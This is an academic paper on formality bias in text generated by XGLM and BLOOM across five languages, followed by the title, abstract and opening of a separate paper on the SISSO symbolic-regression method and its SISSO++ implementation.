formality_, characterized by the understanding of the precise meaning, avoiding ambiguity; and a _surface formality_ which focuses on the rigorous selection of manners. Some recent works focus on the latter to evaluate formality using the selection of words (Brooke et al., 2010) and discarding the topic (Pavlick and Tetreault, 2016). In accordance with Liardet et al. (2019), we use the following rules to evaluate cohesive English text as informal: * Presence of contractions, abbreviations, and colloquial expressions. * Presence of grammar infelicities, that is, unsuitable expressions, inconsistencies in writing, and misspellings. * High occurrence of delexical verbs and phrasal verbs. \begin{table} \begin{tabular}{p{113.8pt} p{113.8pt} p{113.8pt}} \hline \hline \multirow{2}{*}{**Prompt**} & \multicolumn{2}{c}{**Generation**} \\ \cline{2-3} & **XGLM(7.5B)** & **BLOOM(7.1)** \\ \hline \multirow{2}{*}{_Not being able to cry is also very difficult_} & _But people of our hopes and dreams change so much! There could not be a greater example...!_ & _But Anju Ghosh was the one who broke down in tears, her daughter said. 
Anju Ghosh returned to work after spending time with her daughter Afzal Hosain, a veteran actor and theater personality of the country, died at Tongi Government Hospital last Thursday around 9 pm._ \\ \hline \hline \end{tabular} \end{table} Table 1: XGLM (Lin et al., 2021) and BLOOM (Scao et al., 2022) generating predictions of different formality (informal in red and formal in green) based on a Bengali formal prompt sampled from the InFormal dataset (Krishna et al., 2022). As illustrated here, the formality of the predictions differ between XGLM and BLOOM. * Higher involvement of human participants and subjective judgments, such as opinions. FrenchFormality is typically classified in French into three classes: _soutenu_, _covarant_ and _familiar_Gadet (2005); Beeching et al. (2009). The register _soutenu_ is reserved for legal documents, literature, or when addressing someone we want to show particular respect (e.g., a judge). It usually involves addressing someone with the second singular person (called _vousvoment_). The register _covarant_ corresponds to the one used in day-to-day life, for instance when we talk to someone new which is typically neutral and includes few grammatical errors. The register _familiar_ is the one used with friends, or within a family circle. It usually involves addressing someone with the second singular person tu (_tutoiment_). It can include a large portion of grammatical errors. It can also include slang and insults in their most vulgar form. In this work, following what was done in the XFORMAL work Briakou et al. (2021), we classify generated text into two classes. Soutenu is associated with the formal class while _familiar_ and _covarant_ with the informal class. SpanishFormality in Spanish is commonly described by the T-V distinctions in the singular second-person pronoun derived from Latin. Specifically, there are two possible translations for the English pronoun "**you**": \(\mathbf{t}\mathbf{\dot{u}}\) is considered informal while _usted_ is formal. Both pronouns have different conjugations. Thus, the formality in sentences that use the singular second person is easily recognizable. In the case of the other pronouns, the first person is often considered less polite than the third one Stewart (2001). For that reason, the third person is commonly used in scientific texts Salazar et al. (2013). Aside from the pronouns and their conjugations, according to Cepeda and Tavera (2007), a formal text in Spanish should accomplish other characteristics such as: * Having no typographical or grammatical errors. * Being a set of sentences referring to the same topic. * Being arranged in paragraphs and having a coherent correlation between ideas using appropriate connectors. In our work, we check the presence of slang or offensive terms in a sequence to classify text as informal. Then, T/V distinction in sentences written using the second person defines the formality level. In a similar way, sentences written in the third person have a bigger probability of being classified as formal compared to the ones written in the first person. The final priority is the layout: paragraph-structured sequences are considered as formal in more scenarios than conversational-structured ones. ## 3 Related Work Biases of Generative Language ModelsRecent literature on Large Language Models (LLMs) demonstrated social bias and prejudice against minorities Sheng et al. (2021); Blodgett et al. (2020); Bender et al. (2021); Bommasani et al. (2021); Liang et al. 
(2021) in terms of many categories including gender Sun et al. (2019); Cao and Daume III (2020); Felkner et al. (2022), race Davidson et al. (2019), religion Abid et al. (2021); Malik et al. (2022), occupation, politics and disabilities which result in the production of damaging content. Evaluating social bias and harm produced by monolingual language models is hard, but difficulties increase in multilingual settings. To create multilingual evaluation frameworks, it has been argued that careful curation of culturally aware datasets and knowledge of cultural differences that exist between languages is necessary Talat et al. (2022). Many papers have focused on measuring social biases and stereotypes against historically disadvantaged groups and counteracting them for a limited number of languages like English Nadeem et al. (2021); Nangia et al. (2020); Barikeri et al. (2021), French Neveol et al. (2022), Hindi Malik et al. (2022), but similar work has not been done for low-resource languages like Bengali. Since LLMs such as BLOOM Scao et al. (2022) can be continuously (re)trained and are deployed by companies to be accessible by users, proposals have been made to create social bias verification pipelines for LLMs similar to software testing Nozza et al. (2022). To our knowledge, the evaluation of multilingual models for measuring cultural biases like formality has not been attempted so far. Formality AnalysisPrevious work in formality analysis has focused on formality classification Heylighen and Dewaele (1999); Abu Sheikha and Inkpen (2010); Pavlick and Tetreault (2016); Demen tieva et al., 2022), formality style transfer in English (Rao and Tetreault, 2018; Wang et al., 2019, 2020; Czeresnia Etinger and Black, 2019; Madaan et al., 2020; Yao and Yu, 2021; Briakou et al., 2021), and in the multilingual setting (Korotkova et al., 2019; Briakou et al., 2021; Krishna et al., 2022). Formality-sensitive machine translation to control the generation of machine translation models to target formality has received attention in recent years (Sennrich et al., 2016; Niu et al., 2017; Feely et al., 2019; Viswanathan et al., 2020; Niu and Carpuat, 2020; Schioppa et al., 2021) and benchmark MT datasets and models have been published (Nadejde et al., 2022; Rippeth et al., 2022). Recently, several datasets with formality annotations have been introduced in multiple languages. Initial attempts included annotating sentences from various resources such as emails, news, online forums, and blog sentences with numerical formality rating (Lahiri, 2015; Pavlick and Tetreault, 2016). The Grammarly's Yahoo Answers Formality Corpus (GYAFC) (Rao and Tetreault, 2018) is a benchmark formality style transfer dataset for English. XFORMAL (Briakou et al., 2021) extended formality style transfer to the multilingual setting by collecting data for four European languages (Brazilian, Portuguese, French, and Italian). InFormal (Inflic Formality Evaluation Dataset) (Krishna et al., 2022) is a small dataset of 4k samples in four Indic languages - Hindi, Bengali, Kannada, Telugu with crowdsourced formality annotations. TAOCD (The Arabic Online Commentary Dataset) (Zaidan and Callison-Burch, 2011) presents an annotated dataset of informal Arabic with high dialectal content with 108k labeled sentences. In our work, we use GYAFC (English), XFORMAL (French), TAOCD (Arabic), and InFormal (Bengali) to source prompts for our analysis of language models along with other resources described in table 2. 
In the following sections, we describe our experiments and results for different languages. ## 4 Experiments We evaluate different dimensions of formality of the generation outputs of two state-of-the-art generative multilingual language models: XGLM (Lin et al., 2021) and BLOOM (Scao et al., 2022), in five languages: Arabic, Bengali, English, Spanish, and French. We hypothesize that the influence of high-resource languages in the corpus can involve biases in the formality of the whole models. To see their behavior in different scenarios, we employ distinct variations of prompt lengths and formality. In addition, we tweak some parameters when generating to avoid incohesive outputs. ### Language Models Xglm(Lin et al., 2021) is a multilingual generative language model based on a decoder transformer. XGLM is trained with 500 billion tokens belonging to 30 languages. XGLM aims to achieve multilingual zero-shot and few-shot learning performance for different tasks. To do so, their authors propose multilingual prompting to improve the results of single-language prompts. XGLM has five sizes according to their number of parameters ranging from 564 million to 7.5 billion parameters. We employ the models with 2.9 and 7.5 billion parameters for this study3. Footnote 3: We use the checkpoints and implementations from [https://huggingface.co/models](https://huggingface.co/models) Bloom(Scao et al., 2022) is also a multilingual generative language model trained on around 341 billion tokens from a corpus of 59 languages (13 of them are programming ones) to democratize huge pre-trained language models. BLOOM was trained from a collection of multiple sources such as Huggingface datasets, Github code, and Web Common Crawl. The data sources were then preprocessed to reduce non-natural language and anonymize personal identifiable information. BLOOM used architectural improvement introduced with the Megatron-LM GPT2 (Shoeybi et al., 2019), such as a normalization layer after the embeddings, ALiBi positional embeddings (Press et al., 2021), and a Byte-Level Byte Pair Encoding (Radford et al., 2019). BLOOM was released in different sizes ranging from 560 million to 176 billion parameters. We use the 3B and 7.1B parameter checkpoints\({}^{2}\) for our experiments as they can be compared to XGLM ones. XLGM and BLOOM are decoder-based transformers pre-trained on a similar set of languages with a comparable amount of data. We compare checkpoints of similar scale (i.e. we compare XGLM 2.9B with BLOOM 3B and XGLM 7.5B and BLOOM 7.1B). Regarding the proportion and data sources on which both models were trained, BLOOM was trained on a more varied set of domains than XGLM in spite of the XGLM corpus being larger. In addition, the BLOOM corpus has a more balanced distribution of the amount of data of the languages evaluated in this study. More details about the quantity and sources of both models can be found in Appendix C. ### Prompting for Formality Evaluation We employ two prompting strategies to condition the generation of the models. In that way, the behavior of the model in different scenarios can be assessed. Short Neutral PromptsA short prompt is composed of up to three words to condition the language of the output without giving any context that could impact the formality level. That allows us to measure the models' tendency to produce a certain formality level with a neutral input. 
For the lexicon of each language4, we pick a set of common words (or a combination of them to avoid the confusion of languages when generating) that can be used in both formal and informal sentences. We illustrate the short prompt we use in Table 2. Footnote 4: [http://corpus.rae.es/lfrecuencias.html](http://corpus.rae.es/lfrecuencias.html), [https://www.pinhok.com/kb/bengali/98/100-basic-bengali-vocabularies/](https://www.pinhok.com/kb/bengali/98/100-basic-bengali-vocabularies/), [https://talkinarabic.com/arabic-words/](https://talkinarabic.com/arabic-words/), [https://en.wikipedia.org/wiki/Most_common_words_in_English](https://en.wikipedia.org/wiki/Most_common_words_in_English) [https://stromenninc.com/1000-most-common-french-words-frequency-vocabulary/](https://stromenninc.com/1000-most-common-french-words-frequency-vocabulary/) Long Informal/Formal PromptsThis set of prompts is composed of truncated sentences extracted from existing formal/informal sources. Using these prompts, we can verify how much the models preserve the formality level of their input. The sources of the prompts include formality datasets such as GYAFC Rao and Tetreault (2018), XFORMAL Briakou et al. (2021), InFormal Krishna et al. (2022). We also include dataset crawlings from webs Zaidan and Callison-Burch (2011); Canete (2019) and informal songs Munoz (2018). Table 2 details which words/group of words we use as short prompts and the dataset sources of the formal/informal prompts for each language. ### Generation Parameters Decoding parameters are important because they can affect the output of a language model directly. For each language, we select a set of parameters to produce fluent text that can be evaluated properly. All selections were chosen to impact the natural formality level of models as less as possible. This subsection presents our list of generation parameters to reproduce our experiments. Global generation parametersOur evaluation of the models is based on the formality of the outputs of each model. Very short sentences, code snippets, and outputs in other languages cannot be evaluated properly. This set of parameters is a collection of language-independent configurations to produce an assessable amount of outputs with a significant length to be evaluated. 1. We filter out the generation sequences that are not natural language (i.e., code) by excluding from the generation process all the tokens that contain any of the following symbols: {, }, (, ), [, ], \(\backslash\), \(<\), \(>\), \(|\), and \(;\backslash n\). 2. We force the model to generate at least 30 new subword tokens (excluding the prompt) to have a long enough generation sequence and be able to assess formality. 
\begin{table} \begin{tabular}{c c c c} \hline \hline & **Neutral\({}^{+}\)** & **Formala\({}^{\bullet}\)** & **Informal\({}^{\bullet}\)** \\ \hline **ar** & _(WhenThen), \({}_{\blacksquare}\)_ & TAOCD & TAOCD \\ & _(Yes), \({}_{\blacksquare}\)_ & _(There)_, & (Zaidan & (Zaidan \\ & _(Unless), \({}_{\blacksquare}\)_ & and & and \\ & _(If), \({}_{\blacksquare}\)_ & _(From), \({}_{\blacksquare}\)_ & Callison- \\ & _(At/When), \({}_{\blacksquare}\)_ & _(I)_ & Burch, \\ & _(No)_ & & 2011) \\ **bn** & _(I), \({}_{\blacksquare}\)_ & InFormal & InFormal + \\ & _(His/Her), \({}_{\blacksquare}\)_ & _(If)_, & (Krishna & Microblog \\ & _(It), \({}_{\blacksquare}\)_ & _(What), \({}_{\blacksquare}\)_ & _(What), \({}_{\blacksquare}\)_ & dataset \\ & _(Why), \({}_{\blacksquare}\)_ & _(Of)_ & _(2022)_ & _(Chowd-_ \\ & _(He/She), \({}_{\blacksquare}\)_ & _(OR)_, & _(R)_ & _(Chowd-_ \\ & _(They)_ & & & \\ & _(But), \({}_{\blacksquare}\)_ & _(R)_ & & \\ & _(They)_ & & & \\ **en** & _The, I, This, He, She, You, They, We, Do, There_ & GYAFC & GYAFC \\ & _You, They, We, Do, There_ & (Rao and & Rao and \\ **fr** & C’est _(It is), Is _(They)_, & XFORMAL \\ & Elles _(They), II _(He),_ & XFORMAL \\ & elle _(She),_ & ce _(This)_, & Est-ce que _(question)_, & _(Briakou et al., 2021b)_ & _(Briakou et al., 2021b)_ \\ & Ca _(That),_ & Ce _(This)_, & Deux (Two)_ & Wikipedia & _9322 rap \\ **es** & Por la _(For the),_ & _(The),_ & _(Canete, 2019)_ & _(Canete, 2019)_ \\ & el _(For the),_ & Con unos & _(With some),_ & _(filtered)_ \\ & la _(Why the),_ & _(She)_ & _(It_ & \\ & _(And),_ & Por su _(Becausse & 2018)_ \\ & _of),_ & Para un _(For a)_, & De una _(Of a)_ & \\ \hline \hline \end{tabular} \end{table} Table 2: Prompts used in our experiments. \({}^{+}\)List of the short prompts across the 5 languages. 10 prompts per language are used with 10 generation sampled for each prompt. *Sources of the formal/informal prompts. 100 prompts per language are sampled from these datasets. 3. We set a maximum of 150 new tokens of generation to avoid long outputs that could include multiple formality variations. 4. Length of the prompts. For the short-prompt setting, we employ at most three tokens to condition the generation in the desired language. For the formal/informal prompts, we use 15 words (tokenization with white spaces) on average. Regarding the total number of evaluated outputs, we generated three sets for each evaluated model and language: 100 with short, 100 with formal, and 100 with informal prompts. That resulted in 1200 generated outputs for each language. Language-specific generation parametersBefore generating the sequences for formality evaluation, we tweaked some logit parameters for each language. All modifications were done to obtain more fluent sequences and reduce incohesive outputs such as ones with generation repetitions or non-understandable text. This process was done with a varied set of prompts regardless of length and formality level. We use sampling to obtain the generation outputs for both models. Three specific parameters were set for both models: We set **top-k** to 50, which truncates the number of tokens to sample from. We set a high **top-p**Holtzman et al. (2019) to generate diverse sampled tokens by cumulative frequency, and a high **temperature**Ackley et al. (1985), which does not skew the distribution towards high probability tokens. The specific details of the parameters can be found in Appendix 6. ### Formality Evaluation We assessed the formality of all generated outputs. 
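To make the decoding configuration above concrete, a possible realization with the Hugging Face transformers API is sketched below. The checkpoint name, the exact top-p and temperature values, and the way excluded symbols are turned into banned token ids are assumptions for illustration only; the paper defers its exact values to the appendix.

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_name = "bigscience/bloom-3b"            # illustrative checkpoint choice
tok = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)

# Exclude any token whose surface form contains code-like symbols.
banned_symbols = set("{}()[]\\<>|;")
bad_words_ids = [
    [tid] for tid in range(len(tok))
    if banned_symbols & set(tok.convert_ids_to_tokens(tid))
]

prompt = "Por la"                             # one of the short neutral Spanish prompts
inputs = tok(prompt, return_tensors="pt")
outputs = model.generate(
    **inputs,
    do_sample=True,
    top_k=50,                                 # truncate sampling to the 50 most likely tokens
    top_p=0.95,                               # assumed high nucleus-sampling value
    temperature=1.2,                          # assumed high temperature
    min_new_tokens=30,                        # at least 30 new subword tokens
    max_new_tokens=150,                       # at most 150 new tokens
    bad_words_ids=bad_words_ids,
)
print(tok.decode(outputs[0], skip_special_tokens=True))
```

Filtering bracket- and code-like tokens in this way keeps the sampled continuations in natural language, so that each one can then be assessed for formality as described next.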
To do so, one native/proficient speaker of each language classified all 1200 generated sequences individually. We opted for this evaluation procedure because, at the time of performing the experiments, to our knowledge, there were no multilingual formality classifier models that include Arabic, Bengali, English, Spanish, and French. To avoid possible biases, each generated output was annotated without looking at its prompt and in a randomized order. The classification categories for all languages are **formal, informal**, and **incohesive**. A sequence is classified as formal or informal according to the rules of each language described in section 2. The "Incohesive" label is only assigned under certain conditions, such as sequences written in other languages, non-understandable text, very short sequences that cannot be evaluated for formality level, or code snippets. ## 5 Results & Analysis We interpret our results across different dimensions. We start by analyzing the cohesiveness of each model. We then exclude the incohesive text from our formality analysis. ### Cohesiveness of Generation As seen in Table 3, BLOOM(7.1B) generates significantly more cohesive texts than XGLM(7.5B) for English, French, and Spanish with p-values under 5%, based on a permutation-based statistical test. Interestingly, the results in Table 3 also show that a larger model does not necessarily lead to more cohesive generations. For example, BLOOM(3B) generates more cohesive texts than BLOOM(7.1B) for Bengali and English. XGLM(2.9B) also generates more cohesive texts than XGLM(7.5B) for English, French, and Spanish. We note that we are only evaluating cohesiveness in a binary way (cohesive vs. incohesive) and are not judging the quality of the predictions beyond that. Besides, the percentage of incohesive texts is noticeably higher for some languages than others for both BLOOM and XGLM. For example, the highest percentage of incohesive texts in the case of Bengali, English, and Spanish is less than or equal to 10%, while that percentage is higher in the case of Arabic and French. ### Formality-Level Bias Neutral prompts, given to an assumingly unbiased model, should lead to equitable distributions of \begin{table} \begin{tabular}{c c c c c c} \hline \hline **Model/Language** & **Arabic** & **Bengali** & **English** & **French** & **Spanish** \\ \hline XGLM(2.9B) & 9.3\% & 8.0\% & 6.7\% & 16.0\% & 6.7\% \\ BLOOM(3B) & 13.3\% & 4.3\% & 3.3\% & 12.0\% & 3.3\% \\ \hline XGLM(7.5B) & 8.7\% & 5.0\% & 10.0\% & 18.0\% & 7.7\% \\ BLOOM(7.1B) & 12.3\% & 6.3\% & **3.7\%* & **8.7\%* & **2.7\%* \\ \hline \hline \end{tabular} \end{table} Table 3: Percentages of the incohesive samples out of the 1200 generated samples per language (300 samples per model). Percentages are averaged across prompt types: 400 neutral, 400 formal, and 400 informal prompts. Bolded values show that the corresponding model is significantly better according to a permutation-based statistical test with a p-value of 5% or less. formal and informal generations with a difference close to zero between both generations. However, this is not the case here as we show in Table 4. In the case of Bengali, we see that XGLM(2.9B), BLOOM(3B) and BLOOM(7.1B) are almost neutral with small differences of -3% -6% and -3%, respectively, showing bias toward informal generations. On the other hand, we see XGLM(7.5B), surprisingly, showing significantly more bias toward formal generations than BLOOM(7.1B) with a difference of 33%. 
Upon qualitative analysis, we found that many of the generations of XGLM(7.5B) had Bengali religious Islamic text-like attributes that were considered formal during annotation and the usage of hashtags or emojis was also less than the smaller model for neutral prompts. BLOOM, for French, continues to show less bias showing only a bias of 1% toward informal generations in the case of BLOOM(3B) and 14% towards formal generations in the case of BLOOM(7.1B). On the other hand, XGLM(2.9) shows significantly more bias than BLOOM(3B) toward formal generations with a difference of 41%. For English, XGLM and BLOOM both show a small bias (in terms of percentages) towards different directions. XGLM(2.9B) and XGLM(7.5B) show bias towards formal generations by 14% and 8% respectively. However, BLOOM(3B) and BLOOM(7.1B) display bias towards informal generations by 6% and 13% respectively. After a careful review of the predictions, we find that French and English informal predictions of BLOOM are due to a large proportion of informal generated dialog. BLOOM, this time for Spanish, shows extreme bias towards the formal generations with a difference of 79% for BLOOM(3B) and 67% for BLOOM(7.1B). On the other hand, XGLM exhibits less bias towards formal generations with a difference of 58% for XGLM(2.9B) and 45% for XGLM(7.5B). These values indicate that both models are influenced by formal sources. In fact, most of the generated sequences with short prompts have the style of news titles/contents and Wikipedia articles. A biased distribution of outputs could be reasoned by the data the model was trained on. As stated in BLOOM (Scao et al., 2022), the biggest part of the corpus for Arabic was the Arabic-focused Masader repository (Alyafeai et al., 2021; Altaher et al., 2022), which is dominated by Modern Standard Arabic (MSA) that is considered formal according to our definition of formality in section 2. This explains the extreme bias BLOOM(3B) and BLOOM(7.1B) show towards formal generations with a bias of 100%. XGLM(7.5B) similarly shows an extreme bias toward formal generations, but significantly less than BLOOM(7.1B) with a difference of 83%. In terms of model size, we notice that XGLM(2.9B) shows more bias towards formal or informal generations than XGLM(7.5) for all the languages except Bengali, which could indicate that the bigger the XGLM model's size, the less biased it is. On the other hand, this isn't the case for BLOOM as BLOOM(3B) is only expressing more bias for Bengali and Spanish, while BLOOM(7.1B) shows more bias for English and French. In summary, the models show moderate bias for some languages such as English and Bengali, except for XGLM(7.5B) in the case of Bengali, while also showing extreme bias for other languages such as Arabic, French, and Spanish. This difference might be caused by the fact that every language is present in the data with a different percentage and is coming from different sources as shown in Table 7. Overall, it is noticeable that the bias is mostly toward formal generations for all the models and for all the languages. ### Formality-Level Preservation In this experiment, we measure how well the formality level of a generation is the same as the formality level of the prompt (i.e. how well the model preserves the formality-level of the prompt). We find that the formality style of the prompts is preserved efficiently for some languages by some models while being almost ignored in some other cases. 
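The significance markers in Tables 3, 4, and 5 are obtained from a permutation-based statistical test over the annotated generations. As a minimal sketch of such a test (assuming per-generation binary outcomes and a difference-in-proportions statistic; the exact statistic used in our experiments may differ), one could use:

```python
import numpy as np

def permutation_test(outcomes_a, outcomes_b, n_resamples=10_000, seed=0):
    """Two-sided permutation test on per-generation binary outcomes.

    outcomes_a / outcomes_b: arrays of 0/1 annotations for the two models
    being compared (e.g., 1 = cohesive). Returns an approximate p-value for
    the observed difference in proportions under random relabelling.
    """
    rng = np.random.default_rng(seed)
    a, b = np.asarray(outcomes_a), np.asarray(outcomes_b)
    observed = abs(a.mean() - b.mean())
    pooled = np.concatenate([a, b])
    hits = 0
    for _ in range(n_resamples):
        rng.shuffle(pooled)  # random relabelling of the annotated samples
        diff = abs(pooled[:len(a)].mean() - pooled[len(a):].mean())
        hits += diff >= observed
    return (hits + 1) / (n_resamples + 1)

# Example usage (hypothetical label arrays, one entry per annotated generation):
# p = permutation_test(bloom_labels, xglm_labels)  # significant if p <= 0.05
```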
For Arabic, as we show in Table 5, BLOOM(3B) \begin{table} \begin{tabular}{c c c c c c} \hline \hline **Model/Language** & **Arabic** & **Bengali** & **English** & **French** & **Spanish** \\ \hline XGLM(2.9B) & 92\% & -3\% & 14\% & 41\% & 58\% \\ BLOOM(3B) & 100\% & -6\% & -6\% & **-1\%\(\ast\)\(\ast\)** & 79\% \\ \hline XGLM(7.5B) & **83\%\(\ast\)** & 33\% & 8\% & 32\% & 45\% \\ BLOOM(7.1B) & 100\% & 35\%\(\ast\) & -13\% & 14\% & 67\% \\ \hline \hline \end{tabular} \end{table} Table 4: Differences between formal and informal sample percentages of 400 samples per language (100 samples per model) sampled with neutral prompts. A green color indicates a bias toward formal generations and a pink color indicates a bias toward informal generations. Bolded values show that the corresponding model is significantly better according to a permutation-based statistical test with a p-value of 5% or less. and BLOOM(7.1B) preserve the formality style of 94.2% and 93.5%, respectively, of the samples when the given prompt is formal. However, BLOOM does not pay that much attention to the style of the informal prompts and preserves the style of only 55.1% of the samples with BLOOM(3B) and 51.1% of the samples with BLOOM(7.1B). This confirms our finding from section 5.2 that showed that BLOOM is biased toward formality in Arabic. XGLM(7.5B), on the other hand, preserves the informal style of the prompts significantly better than BLOOM(7.5B) with a percentage of 76.7%. XGLM(2.9B), for Bengali, preserves the style of the informal prompts of significantly more samples than BLOOM(3B) with a percentage of 100%. BLOOM pays attention to the informal style of the prompts as well, unlike the case for Arabic, and preserves the style of 87.1% of the samples generated with BLOOM(3B) and 91.9% of the samples generated with BLOOM(7.1B). Both BLOOM and XGLM, this time for English, do not preserve the formal style of the prompts for more than 34.4% of the samples for any model. However, they both preserve the informal style in at least 84.7% of the generated samples with BLOOM(7.1B) preserving significantly more samples than XGLM(7.5B). A similar trend follows for French with both BLOOM and XGLM unable to preserve the formal style for more than 32.0% of the samples in the case of XGLM(2.9B), BLOOM(3B) and BLOOM(7.1B). On the other hand, XGLM(7.5) preserves the formal style significantly better than BLOOM(7.1B) with a percentage of 54.0%. And again the informal style is being preserved better with, specifically, BLOOM(3B) which preserves the style better than XGLM(2.9B) with a percentage of 82%. The formal and informal styles in Spanish are preserved consistently across the models to at least 77.8% of the samples with formal prompts and at least 75.8% with informal prompts with BLOOM(7.1B) preserving the style in significantly more samples than XGLM(7.5B). In terms of model size, we notice that the size of the model is not an indicator of how well the model can preserve the formality style. For example, BLOOM(3B) preserves the formal style better than BLOOM(7.1B) for all languages except Spanish. In summary, we see that the informal style is mostly preserved well for most languages except with BLOOM for Arabic. The formal style, on the other hand, is mostly preserved well for all languages except English and French. ### General Statistics about Generations We report in Table 8 general statistics about the generated texts of each model and language by formality level. 
Results show that BLOOM generates about twice longer texts as XGLM. In terms of the average number of sentences per generation, BLOOM, when the generation is informal, generates more and shorter sentences than when the generation is formal. Also, informal generations tend to have emojis as expected, especially in the case of Bengali. Besides, informal generations tend to have more punctuation marks than formal ones. Finally, the results of the average number of new lines and the average number of "-", which are used to signal dialogues, support what we mentioned earlier about BLOOM's tendency to generate conversational text. ## 6 Discussion Formality bias when present in multilingual models, which are increasingly popular nowadays, can lead to undesirable outcomes. For example, using _"please"_ is common among North American En \begin{table} \begin{tabular}{c c c c c c} \hline \hline \multirow{2}{*}{**Model/Language**} & **Arabic** & **Bengali** & **English** & **French** & **Spanish** \\ & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** \\ \hline XGLM(2.9B) & 89.4\% / 61.1\% & 79.8\% / **100.0\%*** & 34.0\% / 94.0\% & 26.7\% / 59.5\% & 85.9\% / 80.2\% \\ BLOOM(3B) & 94.2\% / 55.1\% & 83.7\% / 87.1\% & 29.2\% / 91.7\% & 32.0\% / **82.0\%*** & 77.8\% / 90.4\% \\ \hline XGLM(7.5B) & 88.6\% / **76.7\%*** & 75.5\% / 98.8\% & 34.4\% / 84.7\% & **54.0\%*** / 75.6\% & 86.9\% / 75.8\% \\ BLOOM(7.1B) & 93.5\% / 51.1\% & 74.0\% / 91.9\% & 27.6\% / **94.0\%*** & 25.8\% / 66.7\% & 83.8\% / **96.8\%*** \\ \hline \hline \end{tabular} \end{table} Table 5: Formality preservation samples’ percentages for **Formal / Informal** prompts (800 prompts per language: 400 formal and 400 informal). Each sample is annotated as either formal, informal, or incohesive and the percentages are calculated without incohesive text counts. Bolded values show that the corresponding model is significantly better according to a permutation-based statistical test with a p-value of 5% or less. glish native speakers in requests, even among close friends, while in Arabic, it could be considered awkward, if not rude, in conversations among close friends (Hovy and Yang, 2021). A usage example of language models is solving downstream tasks using prompting techniques for zero-shot learning, such as (Zhong et al., 2021)'s work on question-answering. Prompting has also been used to utilize large language models for conversational chatbots such as ChatGPT (Ouyang et al., 2022). As prompting is becoming popular, we must understand that prompting a model that exhibits formality bias could be a barrier to getting the expected output. Furthermore, depending on the application, formality bias could even lead to sometimes unwanted misunderstandings (Hershcovich et al., 2022) and conflicts if the models, for example, are not able to generate text in the formality style of the users' expectations. Controlling LLMs generations has been taken into consideration in recent work, such as (Ouyang et al., 2022), which fine-tuned a language model (Brown et al., 2020) intending to align the model with the intent of the users using reinforcement learning from human feedback (RLHF) (Christiano et al., 2017; Stiennon et al., 2020). Future work could analyze the impact of RLHF on the formality distributions present in language models. 
Furthermore, our work focused only on two pre-trained models with up to 7B parameters. The same analysis could be conducted for larger models such as GPT-3 and BLOOM(175B). Finally, the increase in the number of multilingual language models calls for more work on the bias analysis of multilingual language models. ## 7 Conclusion In conclusion, we analyzed the formality level of the generations of two large-scale generative language models, XGLM and BLOOM, ranging from 2B parameters to 7B parameters. We first observed the cohesiveness of the predictions. We found that BLOOM(7.1B) predicts significantly more cohesive text than XGLM(7.5B) for English, French, and Spanish. Second, we showed that, across all five languages, both models tend to generate formal text when prompted neutrally. Finally, we found that the formality of the prompt highly impacts both models. In most cases, they generate the same style as the prompt, with slight differences between the models depending on the language. Our analysis is based on the annotations of 1,200 generations in Arabic, Bengali, English, French, and Spanish. We release them with this paper opening future avenues for modeling the formality of generative multilingual language models. ## 8 Acknowledgment We thank the Fatima Fellowship5 and Hugging Face for organizing and sponsoring the Fatima Research Fellowship program. Footnote 5: cf. [https://www.fatimafellowship.com/](https://www.fatimafellowship.com/)
2305.01242
Recent advances in the SISSO method and their implementation in the SISSO++ code
Accurate and explainable artificial-intelligence (AI) models are promising tools for the acceleration of the discovery of new materials, or new applications for existing materials. Recently, symbolic regression has become an increasingly popular tool for explainable AI because it yields models that are relatively simple analytical descriptions of target properties. Due to its deterministic nature, the sure-independence screening and sparsifying operator (SISSO) method is a particularly promising approach for this application. Here we describe the new advancements of the SISSO algorithm, as implemented into SISSO++, a C++ code with Python bindings. We introduce a new representation of the mathematical expressions found by SISSO. This is a first step towards introducing "grammar" rules into the feature creation step. Importantly, by introducing a controlled non-linear optimization to the feature creation step we expand the range of possible descriptors found by the methodology. Finally, we introduce refinements to the solver algorithms for both regression and classification that drastically increase the reliability and efficiency of SISSO. For all of these improvements to the basic SISSO algorithm, we not only illustrate their potential impact, but also fully detail how they operate both mathematically and computationally.
Thomas A. R. Purcell, Matthias Scheffler, Luca M. Ghiringhelli
2023-05-02T08:00:28Z
http://arxiv.org/abs/2305.01242v1
# Recent advances in the SISSO method and their implementation in the SISSO++ code ###### Abstract Accurate and explainable artificial-intelligence (AI) models are promising tools for the acceleration of the discovery of new materials, ore new applications for existing materials. Recently, symbolic regression has become an increasingly popular tool for explainable AI because it yields models that are relatively simple analytical descriptions of target properties. Due to its deterministic nature, the sure-independence screening and sparsifying operator (SISSO) method is a particularly promising approach for this application. Here we describe the new advancements of the SISSO algorithm, as implemented into SISSO++, a C++ code with Python bindings. We introduce a new representation of the mathematical expressions found by SISSO. This is a first step towards introducing "grammar" rules into the feature creation step. Importantly, by introducing a controlled non-linear optimization to the feature creation step we expand the range of possible descriptors found by the methodology. Finally, we introduce refinements to the solver algorithms for both regression and classification, that drastically increase the reliability and efficiency of SISSO. For all of these improvements to the basic SISSO algorithm, we not only illustrate their potential impact, but also fully detail how they operate both mathematically and computationally. ## I Introduction Data-centric and artificial intelligence (AI) approaches are becoming a vital tool for describing physical and chemical properties and processes. The key advantage of AI is its ability to find correlations between different sets of properties without the need to know which ones are important before the analysis. Because of this, AI has become increasingly popular for materials discovery applications with uses in areas such as thermal transport properties [1; 2], catalysis [3; 4; 5], phase stability [6], and quantum materials [7]. Despite the success of these methodologies, creating explainable and physically relevant AI models remains an open challenge in the field [8; 9; 10]. One prevalent set of methods for explainable AI is symbolic regression [11; 12; 13; 14]. Symbolic regression algorithms identify the optimal non-linear, analytic expressions for a given target property from a set of input features, i.e., the _primary features_, that are possibly related to the target [15]. Originally, (stochastic) genetic-programming-based approaches were and still are used to find these expressions [15; 16; 17; 18], but recently a more diverse set of solvers have been developed [19; 20; 21; 22; 23; 24]. The sure-independence screening and sparsifying operator (SISSO) approach combines symbolic regression with compressed sensing [25; 26; 27; 28], to provide a deterministic way of finding these analytic expressions. This approach has been used to describe numerous properties including phase stability [6; 29; 26], catalysis [30], and glass transition temperatures [31]. It has also been used in a multi-task [25] and hierarchical fashion [28]. The SISSO approach starts with a collection of primary features and mathematical unary and binary operators (e.g., addition, multiplication, \(n\)th root, logarithms, etc.). The first step is the _feature-creation_ step, where a pool of _generated 